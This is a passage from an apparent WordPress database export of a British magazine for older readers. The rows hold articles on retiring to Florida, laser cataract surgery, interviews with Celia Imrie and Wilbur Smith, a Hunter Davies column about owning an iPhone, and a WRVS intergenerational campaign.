temperatures</h4>&#13;\n<p>On the basis that every cloud has a silver lining, a positive upside to the US downturn is that Florida is now fantastic value for Britons retiring to the so-called “sunshine state”.</p>&#13;\n<p>The infrastructure is sophisticated, it’s warm every day of the year and there are dozens of daily flights from several UK airports. Homes are as much as 50 per cent less than five years ago and the exchange rate is good. What’s not to like about a location which is now the third favourite overseas retirement destination for Britons, after France and Spain?</p>&#13;\n<p><img class=\"alignright  wp-image-1876\" title=\"91319501\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/04/91319501.jpg\" alt=\"\" width=\"286\" height=\"382\" />Three questions for those moving there concern location, type of home, and red tape. Let’s start with location.</p>&#13;\n<p>“While many British travel [inland] to Orlando, after fighting the crowds to see Mickey and Minnie the thrill wears off and they find out why the bulk of Florida’s residents live within 20 miles of the sea,” says Al Horrigan of RSVP Real Estate, based in coastal Sarasota and an associate of the British estate agent Savills.</p>&#13;\n<p>Most retirees now move to Florida’s west coast in a stretch down from Tampa, where there is a large international airport, to the Everglades National Park, or along the eastern coastline from Miami up to Daytona Beach. In most locations, estate agents report that five years of price falls have finally ended. “The dark night is over at least in the under $400,000 (£250,000) range,” says Horrigan.</p>&#13;\n<p>There is a fantastic choice of properties. In addition to the mobile homes, villas and houses we know from TV programmes about Florida, there is a range of specialist retirement schemes. Different communities, some with thousands of homes and a wide array of shops and leisure facilities, are aimed at active newly-retireds, older retireds, and those requiring differing levels of medical assistance.</p>&#13;\n<p>The final major obstacle is the red tape. Unless you have US family or buy a business to run in later life, it is difficult for British retirees to live in the country permanently.</p>&#13;\n<p></p><div id=\"attachment_1878\" class=\"wp-caption alignright\" style=\"width: 606px\"><img class=\"size-full wp-image-1878\" title=\"Florida: great properties, beautiful beaches\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/04/1404482401.jpg\" alt=\"\" width=\"596\" height=\"404\" /><p class=\"wp-caption-text\">Florida: great properties, beautiful beaches</p></div>&#13;\n<p>What many do is keep a British property, then buy their dream home in Florida. They then secure a B-2 tourist visa, which entitles them to spend about six months of the year in the US.</p>&#13;\n<p>American authorities will normally insist any retiree has evidence of funds to cover a six-month stay. But it is vital to secure appropriate medical insurance – US doctors and hospitals levy premium charges and this can be the largest outgoing for those moving stateside in later life.</p>&#13;\n									</div>','Sunshine state beckons','442','publish','open','open','','sunshine-state-beckons','','','2018-04-02 20:06:32','2018-04-02 20:06:32','',0,'http://westonspirit.org.uk/sunshine-state-beckons.asp',0,'post','',0),(163,1,'2017-08-21 06:29:39','2017-08-21 06:29:39','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">29 April 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"The family that laughs together\" st_url=\"http://westonspirit.org.uk/2012/04/the-family-that-laughs-together/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"The family that laughs together\" st_url=\"http://westonspirit.org.uk/2012/04/the-family-that-laughs-together/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"The family that laughs together\" st_url=\"http://westonspirit.org.uk/2012/04/the-family-that-laughs-together/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"The family that laughs together\" st_url=\"http://westonspirit.org.uk/2012/04/the-family-that-laughs-together/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"The family that laughs together\" st_url=\"http://westonspirit.org.uk/2012/04/the-family-that-laughs-together/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Forget the generation gap – there are lots of things that still bring old and young together in mutual mirth</h4>&#13;\n<p>Recently, my niece overheard me yodelling the lyric of a well-known but hardly current song. Stately as a Galleon (Old Time Dancing to give it its proper title) as performed by the matchless Joyce Grenfell. The song, if you don’t know it, is about a dancing club where the shortage of men means some ladies have to dance together “bust to bust”.</p>&#13;\n<p><img class=\"alignright  wp-image-1836\" title=\"Kipper cartoon\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/04/Kipper-cartoon.jpg\" alt=\"\" width=\"358\" height=\"317\" />When it came to the unforgettable lines: “I danced with Mrs Tiverton/Light on her feet in spite of/Turning the scale at 14 stone/And being of medium height”, 16-year-old Lucy laughed her head off in recognition of Joyce’s spot-on picture of a woman whose agility defies her age and girth.</p>&#13;\n<p>Humour doesn’t always transfer between generations but the wit of Grenfell is one of those that still strikes a chord with anyone, teenage, middle-age or old age, with a sense of the ridiculous. In exactly the same vein are authors such as Roald Dahl, who has always been enjoyed by adults as well as children. Not surprisingly, Dahl is one of the authors children’s writer Chris Powling is recommending in our feature on p11 for grandparents to enjoy with their grandchildren.</p>&#13;\n<p>Stories of an entirely different nature have made Wilbur Smith a highly popular, not to say wealthy, man. As one would expect from a celebrated writer of derring-do stories that traverse the globe, he’s had a few adventures himself.</p>&#13;\n<p>PS: See Joyce doing the military two-step, Waltz Valeta and dear old Lancers on YouTube. Go to <a href=\"http://www.youtube.com/ watch?v=clOdyzP9fcw\" target=\"_blank\">http://www.youtube.com/ watch?v=clOdyzP9fcw</a></p>&#13;\n									</div>','The family that laughs together','269','publish','open','open','','the-family-that-laughs-together','','','2018-04-02 20:06:30','2018-04-02 20:06:30','',0,'http://westonspirit.org.uk/the-family-that-laughs-together.asp',0,'post','',0),(164,1,'2014-04-15 22:42:19','2014-04-15 22:42:19','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">29 April 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"The gift of sight\" st_url=\"http://westonspirit.org.uk/2012/04/the-gift-of-sight/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"The gift of sight\" st_url=\"http://westonspirit.org.uk/2012/04/the-gift-of-sight/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"The gift of sight\" st_url=\"http://westonspirit.org.uk/2012/04/the-gift-of-sight/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"The gift of sight\" st_url=\"http://westonspirit.org.uk/2012/04/the-gift-of-sight/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"The gift of sight\" st_url=\"http://westonspirit.org.uk/2012/04/the-gift-of-sight/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>Patients are enjoying a brighter future, thanks to the latest in sight-enhancing technology and the best medical attention</h4>&#13;\n<p>Millions of British people can look forward to a lifetime of better sight, thanks to a revolutionary treatment – just launched in the UK – that offers safer, more accurate and less invasive treatment for cataracts.</p>&#13;\n<p>For many years, cataracts have been seen as an unavoidable and unpleasant side effect of ageing. Current techniques for cataract removal, which centre on high frequency ultrasound to achieve phacoemulsification, nevertheless require a 3mm incision with a blade, before the cataract is broken up.</p>&#13;\n<p>Where the London Eye Hospital, on Harley Street, differs from this treatment is in the microscopic detail of the procedure. Using a FemtoSecond cataract laser, surgeons create a 3D model of the eye at close to micron levels of accuracy. Laser pulses that last one quadrillionth of a second then dissolve the cataract and also create a tiny incision through which to remove it all without a needle or blade or any discomfort.</p>&#13;\n<p></p><div id=\"attachment_1857\" class=\"wp-caption aligncenter\" style=\"width: 606px\"><img class=\"size-full wp-image-1857\" title=\"Mr Qureshi, right, uses the latest technology to treat cataracts\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/04/138-Mr-QureshiLondonEyeHosp-2..jpg\" alt=\"\" width=\"596\" height=\"378\" /><p class=\"wp-caption-text\">Mr Qureshi, right, uses the latest technology to treat cataracts</p></div>&#13;\n<p>This new approach to cataract surgery – called FemtoSecond Laser Cataract Surgery – also reduces the risk of complications such as damage to the fine membrane surrounding the lens and also the risk of infection, meaning this new procedure represents a huge increase in safety and reduces the risks of surgery even further. Mr Bobby Qureshi became the first surgeon in the UK to use a FemtoSecond laser for cataract surgery in August 2016 and is the most experienced laser cataract surgeon in the UK.</p>&#13;\n<h3>The patient view</h3>&#13;\n<p>Patricia Paul had light adjustable lens surgery at the London Eye Hospital and was delighted by the results. The procedure was performed by Bobby Qureshi, consultant ophthalmic surgeon and medical director at the hospital.</p>&#13;\n<p>“Not only was my procedure a complete success, but Mr Qureshi was an absolute pleasure to work with,” she says. “He always took the time to explain everything, and was never in a rush. I now have the best vision that I’ve ever had. It’s amazing how sharp and colourful everything looks.”</p>&#13;\n<p>At the age of 10, Philip Scarisbrick was diagnosed short-sighted and started wearing glasses. Forty years later, he had light adjustable lens surgery and – as if by magic – his sight has been restored.</p>&#13;\n<p>“It really has transformed my life,” he says at his home in Ashtead, Surrey.</p>&#13;\n<p>“Once I’d had the operation, I could drive around without glasses, go into a restaurant and order from the menu. This was never possible before.”</p>&#13;\n<p>“I can understand people’s anxiety over having an operation on their eyes, but it was very straightforward,” he adds. “It only lasted about 20 minutes; I was conscious throughout and was able to leave soon afterwards.”</p>&#13;\n<p>After surgery the vision can be sharper using just a computer and shining a light at the lens to achieve the best vision possible without glasses.</p>&#13;\n<p>The service provided by the London Eye Hospital and the surgeon Mr Qureshi was exemplary, according to Philip Scarisbrick. “He always had time for me and would explain everything that was going to happen. He was very detailed and thorough, but you never felt he was in any rush: he went through the process in as much time as you needed.”</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><strong><em>0207 060 2602</em></strong></p>&#13;\n<p><strong><em><a title=\"London Eye Hospital \" href=\"http://www.londoneyehospital.com/\" target=\"_blank\">www.londoneyehospital.com</a></em></strong></p>&#13;\n									</div>','The gift of sight','555','publish','open','open','','the-gift-of-sight','','','2018-04-02 20:06:29','2018-04-02 20:06:29','',0,'http://westonspirit.org.uk/the-gift-of-sight.asp',0,'post','',0),(166,1,'2017-09-18 01:23:05','2017-09-18 01:23:05','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">1 April 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"This life, Celia Imrie\" st_url=\"http://westonspirit.org.uk/2012/04/this-life-celia-imrie/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"This life, Celia Imrie\" st_url=\"http://westonspirit.org.uk/2012/04/this-life-celia-imrie/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"This life, Celia Imrie\" st_url=\"http://westonspirit.org.uk/2012/04/this-life-celia-imrie/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"This life, Celia Imrie\" st_url=\"http://westonspirit.org.uk/2012/04/this-life-celia-imrie/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"This life, Celia Imrie\" st_url=\"http://westonspirit.org.uk/2012/04/this-life-celia-imrie/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>She started in soft porn and showed us her bakewells on stage. But as she nears 60, Celia Imrie tells Maureen Paton that the role of retiree is not one she’ll take on anytime soon</h4>&#13;\n<p>She’s the character actress who became a star. Instantly recognisable with that expressively long upper lip and inimitable upper-crust drawl, the Olivier Award-winning Celia Imrie seems to be everywhere on film and TV, as well as the West End stage.</p>&#13;\n<p>And as she approaches the landmark of her 60th birthday in July, she’s taking on even more work in the profession she loves because, she explains: “I’ve got to hurry up now because I think I’m running out of time a bit.</p>&#13;\n<p><img class=\"alignright  wp-image-1807\" title=\"Celia Imrie\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/03/NEW-TITANIC_1791.jpg\" alt=\"\" width=\"358\" height=\"537\" />“I want to grab everything: I’m quite greedy and I want to do as many more different things as I can. You’ve got to live for the moment, and acting allows you to do that. And I love the freelance life of not knowing what’s happening next.”</p>&#13;\n<p>As with Julie Walters, Celia’s ace card is her comic ability. Both actresses got their big breaks in their 30s in Victoria Wood’s 1980s TV shows, with Celia’s overemoting, blonde-wigged Miss Babs the perfect foil to Julie’s slatternly, hairnetted Mrs Overall as they camped it up in the cult soap spoof Acorn Antiques.</p>&#13;\n<p>They co-starred again in the film Calendar Girls with Celia famously posing behind a large pair of cherry bakewells in the topless scene.</p>&#13;\n<p>Her figure is partly due to a puberty-boosting dose of oestrogen given to help her recovery from an adolescent bout of anorexia which triggered a swift growth spurt. The resulting enhancements also helped to land her a part in the 1974 soft-porn film House of Whipcord, for which she has been teased evermore by her friend Dame Judi Dench.</p>&#13;\n<p>Over the past 40 years, she has shown tremendous versatility with 120 performances on screen alone: from The Phantom Menace to the two Bridget Jones films.</p>&#13;\n<p>Currently she can be seen in the hit film The Best Exotic Marigold Hotel, playing a fun-seeking granny who rebels against the babysitting role and goes to India instead. “It makes me very angry when I hear grown-up children saying to their parents, ‘But you’re spending our inheritance by going off on a cruise’. How outrageous and vulgar!” she shudders.</p>&#13;\n<p>She’s also appearing in the acclaimed London revival of Michael Frayn’s classic farce Noises Off and now Titanic, ITV1’s Sunday night drama from Downton Abbey/Gosford Park screenwriter Julian Fellowes. She plays the nouveau-riche passenger Grace Rushton, who has a firstclass ticket but a second-class background, and it is just the kind of acting challenge that she loves.</p><div class=\"woo-sc-quote\"><p>There’s a queue of people waiting to join in, so you must make sure you are fun to be around”</p></div>&#13;\n<p>“People are so rude to Grace – but I think she’s rather wonderful, particularly for the way she refuses to leave the ship without her pet Pekinese, who is probably her child substitute,” she says.</p>&#13;\n<p>The fourth child of a radiologist father and an aristocratic mother listed in Burke’s Peerage, Celia is a Bohemian free spirit at heart.</p>&#13;\n<p>Based in London’s Kensington with a holiday home on the Isle of Wight, she defines herself as “a bit of an escape artist”.</p>&#13;\n<p>“The only thing my mother wanted me to do was to get married to a God-fearing earl with plenty of money, but I’ve long since been accepted as the lunatic of the family,” she says jokily.</p>&#13;\n<p>She modestly describes herself as “a complete fraud because I trained as a dance teacher and didn’t have a formal drama training, so I’ve learned acting as I’ve gone along”.</p>&#13;\n<p>Although Celia has never married, she has a son, 17-year old Angus, by a short relationship with the actor Benjamin Whitrow. Angus has already acted on screen with his mother, and she thinks that he will probably make it his career, too, “because he has the passion you need to do it”.</p>&#13;\n<p>Despite her success over four decades, she has no illusions about the capriciousness of her business and is now prudently adding a second string to her bow by moving into producing as well.</p>&#13;\n<p>“You have to keep reinventing yourself with different roles. And as an actor, you have to wait to be asked to dance, as it were, so sometimes you need to get into a position where you buy rights and put the damn thing on yourself,” she explains.</p>&#13;\n<p>“I found myself telling a young actress recently to take every role she is offered – that’s the main advice I would pass on to the new generation.”</p>&#13;\n<p>And be good-mannered, too, she adds. “Any actor worth their salt knows that we are two-a-penny; we are completely dispensable, I’m afraid. There’s a queue of people waiting to join in, so you must make sure you are fun to be around.”</p>&#13;\n<p>Her 2016 autobiography is called The Happy Hoofer and this hoofer, it seems, is determined to be a happy hedonist to the end. “Our parents and grandparents would have thought hitting 60 was the end of the world, but my generation is different – 60 now is different from the way it used to be.</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><em>Titanic is on ITV1, Sundays, 9pm</em></p>&#13;\n									</div>','This life, Celia Imrie','864','publish','open','open','','this-life-celia-imrie','','','2018-04-02 20:06:27','2018-04-02 20:06:27','',0,'http://westonspirit.org.uk/this-life-celia-imrie.asp',0,'post','',0),(167,1,'2014-10-04 02:23:58','2014-10-04 02:23:58','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">29 April 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"This life, Wilbur Smith\" st_url=\"http://westonspirit.org.uk/2012/04/this-life-wilbur-smith/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"This life, Wilbur Smith\" st_url=\"http://westonspirit.org.uk/2012/04/this-life-wilbur-smith/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"This life, Wilbur Smith\" st_url=\"http://westonspirit.org.uk/2012/04/this-life-wilbur-smith/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"This life, Wilbur Smith\" st_url=\"http://westonspirit.org.uk/2012/04/this-life-wilbur-smith/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"This life, Wilbur Smith\" st_url=\"http://westonspirit.org.uk/2012/04/this-life-wilbur-smith/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>He’s known for his dashing, daring heroes and Maureen Paton discovers that Wilbur Smith’s own 79 years have had more than their fair share of adventure, travel and romance</h4>&#13;\n<p>The statistics of Wilbur Smith’s success as an author are as breathtaking as his derring-do plots.</p>&#13;\n<p>Since his debut novel, When the Lion Feeds, was first published in 1964, it’s been estimated that the 120m copies of his books sold worldwide could fill Wembley Stadium twice over. South Africa’s most popular literary export has been awarded more Golden Pan statuettes (for sales of 1m) by his publisher, Pan Macmillan, than any other writer, including Ian Fleming.</p>&#13;\n<p>Five of the books have been filmed; and Stephen King and Boris Johnson number among his celebrity admirers, with the mayor of London an avid fan in his teenage years of the sex-and-adrenalin formula of Smith’s headlong historical adventures. Thanks to the South African government slapping a ban on his first four books for their characters’ “indecent, obscene and objectionable” interracial interaction, Smith was a celebrity from the start. “Every schoolboy wanted to find out why they were banned, so it gave me a great career boost,” the 79-year-old grins.</p>&#13;\n<p>A cattle-rancher’s son from Northern Rhodesia (now Zambia), Smith has lived the kind of gung-ho life that inspired many of his stories. Although he was a chartered accountant with a first wife and two children to support by the time he got published, he had hitchhiked 1,500 miles across the Namib desert and worked in goldmines and on trawler fleets and whalers – not to mention fighting off an Alaskan grizzly bear with a fishing rod.</p>&#13;\n<p><img class=\"aligncenter size-full wp-image-1853\" title=\"Wilbur Smith1\" src=\"/wp-content/uploads/2012/04/Wilbur-Smith1.jpg\" alt=\"\" width=\"596\" height=\"397\" />This is all despite a permanent limp left by Smith’s childhood polio as well as a heart murmur from birth; three years ago he had a new valve put in after an arrhythmia scare. Nowadays, although he’s still a great traveller, he says he’s “over-cautious – I don’t look for trouble”.</p>&#13;\n<p>Except in his books, of course. Following the publication of the paperback edition of his 33rd novel, Those in Peril, he’s working on the next one in the study of his Cape Town home at the foot of Table Mountain.</p>&#13;\n<p>“I have an over-busy imagination, my brain can’t stop churning out the ideas,” he admits. He and his fourth wife Mokhiniso – a Tajikstan law graduate known as Niso who is 39 years younger than him – also have a house in London near Harrods (“my wife’s corner shop”) and a chalet in Switzerland. “We are swallows – we follow the sun,” he explains of their habit of spending half the year in Africa.</p>&#13;\n<p>Life has been good to Smith, but he’s not about to get complacent. This surprisingly unassuming creator of superheroes thinks of himself as “experienced rather than wise”, refusing to play the guru and pull rank on account of his age. “It’s tremendous to be human at this time in history: the energy, ideas and opinions of young people today make me optimistic about the future,” he says.</p><div class=\"woo-sc-quote\"><p>I think I’m a great storyteller. And that’s the way I would like history to look upon me”</p></div>&#13;\n<p>Forever fascinated by different cultures and peoples, he makes a point of meeting as many of his readers as possible and recently found himself mobbed by thousands of fans on a book tour of northern India. There he also managed to fit in an elephant ride to track down a tiger in the Corbett National Park by using the warning barks of the local chital deer to find this notoriously nocturnal creature. He describes himself as a strong conservationist “like all true hunters, because we don’t want to see the animals disappear for ever”.</p>&#13;\n<p>Asked how he thinks literary history will judge his books, he replies: “I don’t write literature, I write stories. It bothers me slightly when people say, ‘Oh, he’s not a great writer’, but I think I’m a great storyteller. And that’s the way I would like history to look upon me.”</p>&#13;\n<p>His books reflect his zest for life, and there’s plenty of drive left in him. “The secret of enjoying life is to take it on. I have pretty much fulfilled all my ambitions: to see the great wildernesses, deserts and jungles of the world. Now I just want to do more of the same – but more slowly at my age,” he says, laughing.</p>&#13;\n<p>Yet all his success means nothing, he says, without a companion to share his life. Within months of the death from cancer of his beloved third wife Danielle, he had met Niso in a bookshop.</p>&#13;\n<p>“Niso mended my broken heart. Danielle was my soul mate for 28 years and Niso has stepped into her shoes. What life has taught me is that love is all. There’s nothing that can compare with the bonding of a man and a woman – together, they have the strength of an army.</p>&#13;\n<p>“But in retrospect I’m a stronger, more knowledgeable man for having gone through even the loss of someone dear to me. And although I’m not looking forward to the big red wall at the end of the road, I don’t worry about it. It will come when it comes.”</p>&#13;\n<p>Meanwhile the fictional heroics show no signs of stopping, with Smith aiming to celebrate 50 years of writing in 2014. “Five or six years ago, I was walking down the beach at Muizenberg near here. A stranger in a bathing costume called out, ‘Hello, Wilbur.’ When I said ‘I don’t think I know you’, he said, ‘No, but I know you’.</p>&#13;\n<p>“And then he told me that he had hacked my phone for BOSS [the feared South African security service in the apartheid era] for six months. ‘You are very boring,’ the guy added. ‘You didn’t have any girlfriends on the side, you weren’t running guns or subverting the country.’ To which I replied: ‘For God’s sake, don’t tell my readers!’”</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><em>Those in Peril is published in paperback by Pan, £7.99</em></p>&#13;\n									</div>','This life Wilbur Smith','990','publish','open','open','','this-life-wilbur-smith','','','2018-04-02 20:06:25','2018-04-02 20:06:25','',0,'http://westonspirit.org.uk/this-life-wilbur-smith.asp',0,'post','',0),(168,1,'2015-11-17 08:10:15','2015-11-17 08:10:15','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">29 April 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> hdavies\" title=\"Posts by Hunter Davies\" rel=\"author\"&gt;Hunter Davies</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Who needs to be first at everything?\" st_url=\"http://westonspirit.org.uk/2012/04/who-needs-to-be-first-at-everything/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Who needs to be first at everything?\" st_url=\"http://westonspirit.org.uk/2012/04/who-needs-to-be-first-at-everything/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Who needs to be first at everything?\" st_url=\"http://westonspirit.org.uk/2012/04/who-needs-to-be-first-at-everything/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Who needs to be first at everything?\" st_url=\"http://westonspirit.org.uk/2012/04/who-needs-to-be-first-at-everything/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Who needs to be first at everything?\" st_url=\"http://westonspirit.org.uk/2012/04/who-needs-to-be-first-at-everything/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>I have an iPhone. Pause for wild applause. I knew you would be impressed. I have yet to take it out of the house, but yes, I have one. It does email. So I am told.</h4>&#13;\n<p>It’s lying there like a small black coffin as I wonder if I will ever get the hang of it. It’s so clever, so many symbols and words I don’t understand. Oh I wish one of my grandchildren would arrive.</p>&#13;\n<p>The one I have just discarded, a steam driven Motorola, I never got the hang of that either. I put in the odd £20 and usually had £19.48 left after a year. I rarely gave people my number. Why would I want people to ring me? I don’t want to be bothered. There are probably urgent, exciting voice messages that will lie there, unheard, for ever.</p>&#13;\n<p>Twenty years ago when I got my Amstrad PCW 9512, I had sleepless nights, convinced I was stupid. I persuaded a neighbour to give me some lessons, a woman I had always thought was pretty dopey, but she was a whizz on the Amstrad.</p>&#13;\n<p><img class=\"aligncenter size-full wp-image-1914\" title=\" \" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/04/104202540.jpg\" alt=\"\" width=\"596\" height=\"397\" />I did grow to love it dearly. Probably wrote two million words on it. Didn’t want to give it up. I used to write articles, print them out, fax them in, no probs. Except offices started saying my copy had not come.</p>&#13;\n<p>“Check the fax. Oh do come on,” I’d say. “That little machine, with paper spewing out.” It was eventually discovered in a corner, covered in dust, deaded.</p>&#13;\n<p>Elderly relations had been telling me for years to get a proper computer. They are all ace on modern technology, yet none of them actually writes for a living. They need it to book backpacking trips to the Galapagos Islands.</p>&#13;\n<p>So I got an iMac. Now can’t do without it. I don’t lose chapters the way I used to on the Amstrad, but there is stuff in there I don’t seem able to locate. Hello, come out, you’re wanted.</p>&#13;\n<p>Emailing is brilliant – what a saving – but I am not so enchanted by the internet. Seems to take me for ever to book a train ticket to Carlisle. Be quicker to walk there. I did order food on Ocado – till I ended up with 42 tins of chopped tomatoes.</p>&#13;\n<p>I hate being forced to pay tax and use banks online, the bastards – what was wrong with posting a cheque? We have to, they say, otherwise we will be cut off from what passes for modern life. But this modern life moves on so quickly. We had sundials for 1,000 years, before clocks slowly came in. Time to get the hang of it. I prefer to wait till everyone has whatever it is we have to have, then come in late, when prices are down and there are enough clever clogs around. I did contemplate, a year ago, getting a BlackBerry as people had been raving. Good job I didn’t. They are now obsolete. Then aren’t we all, eventually.</p>&#13;\n									</div>','Who needs to be first at everything?','I have an iPhone. Pause for wild applause. I knew you would be impressed. I have yet to take it out of the house, but yes, I have one. It does email. So I am told.','publish','open','open','','who-needs-to-be-first-at-everything','','','2018-04-02 20:06:24','2018-04-02 20:06:24','',0,'http://westonspirit.org.uk/who-needs-to-be-first-at-everything.asp',0,'post','',0),(169,1,'2015-12-30 07:31:23','2015-12-30 07:31:23','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">29 April 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Why youth wants words from the wise\" st_url=\"http://westonspirit.org.uk/2012/04/why-youth-wants-words-from-the-wise/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Why youth wants words from the wise\" st_url=\"http://westonspirit.org.uk/2012/04/why-youth-wants-words-from-the-wise/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Why youth wants words from the wise\" st_url=\"http://westonspirit.org.uk/2012/04/why-youth-wants-words-from-the-wise/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Why youth wants words from the wise\" st_url=\"http://westonspirit.org.uk/2012/04/why-youth-wants-words-from-the-wise/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Why youth wants words from the wise\" st_url=\"http://westonspirit.org.uk/2012/04/why-youth-wants-words-from-the-wise/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>WRVS campaign is calling for older people to help younger generations navigate tough times by sharing their accumulated life experience. Chief executive <em>David McCullough</em> wants Weston Spirit readers to get involved</h4>&#13;\n<p>Think young people have no time for the older generation? Then I’m pleased to say you can think again. A recent poll from WRVS found young people feel they have a lot to learn from older members of society, particularly in helping navigate the current tough times.</p>&#13;\n<p>Well over half (58 per cent) of those aged 25-34 and almost two-thirds (63 per cent) of 16- to 24-yearolds said they’d welcome advice from over-65s on how to live within their means. Another 55 per cent of 25- to 34-year-olds said they wanted tips on how to waste less food – good for the pocket and the environment.</p>&#13;\n<p><img class=\"alignright  wp-image-1862\" title=\"sb10069478x-001\" src=\"/wp-content/uploads/2012/04/sb10069478x-001cut-2.jpg\" alt=\"\" width=\"322\" height=\"507\" />Those who’ve lived through the second world war, seen several recessions and remember the three-day working week know a thing or two about getting by on what you have. But it’s not just money that younger generations want help with. More than half of 16-34s think over-65s can help them understand the “secret to a happy marriage” and 54 per cent of those in middle age (45-54) are looking for advice on enjoying growing older.</p>&#13;\n<p>As Britain’s largest charity working with older people, we at WRVS know there’s a huge amount of wisdom and experience to be drawn on. Our 40,000 volunteers benefit from it every day, in return for providing a helping hand.</p>&#13;\n<p>But how easy is it for young people to get this advice? A third of 16- to 24-year-olds and one in four aged 25-34 don’t have regular contact with anyone over the age of 65. Opportunities to share experience are diminishing just when they are most needed.</p>&#13;\n<p>That’s why we’ve worked with older people to create a new campaign – WRVS Nationwise – to help bridge the gap.</p>&#13;\n<p>We’ve asked older people what advice they have to share. For example, Jill, aged 67, told us how she kept the kids amused when money was tight: “We had an old reel-to-reel tape recorder and used to record stories on it. We’d make up tales with the children and do lots of different voices. The kids loved it! I suppose you’d do it on a smartphone these days.”</p>&#13;\n<p>A cultural shift is long overdue and we hope WRVS Nationwise will help trigger it by sparking debate about what older people have to offer us all. We want everyone to share their pearls of wisdom for coping in tough times, no matter how old or young.</p>&#13;\n<p>To share yours go to <em><strong><a href=\"http://www.wrvs.org.uk/nationwise\" target=\"_blank\">www.wrvs.org.uk/nationwise</a></strong></em></p><div class=\"woo-sc-hr\"></div>&#13;\n<p><em><strong><img class=\"alignleft size-thumbnail wp-image-1861\" title=\"David McCullough\" src=\"/wp-content/uploads/2012/04/David-McCullough-150x150.jpg\" alt=\"\" width=\"150\" height=\"150\" srcset=\"../../../wp-content/uploads/2012/04/David-McCullough-150x150.jpg 150w\" sizes=\"(max-width: 150px) 100vw150px\" /></strong></em></p>&#13;\n<p> </p>&#13;\n<p> </p>&#13;\n<p><em><strong>David McCullough</strong> is chief executive of <strong>WRVS</strong></em></p>&#13;\n									</div>','Why youth wants words from the wise','437','publish','open','open','','why-youth-wants-words-from-the-wise','','','2018-04-02 20:06:23','2018-04-02 20:06:23','',0,'http://westonspirit.org.uk/why-youth-wants-words-from-the-wise.asp',0,'post','',0),(170,1,'2014-10-19 16:41:26','2014-10-19 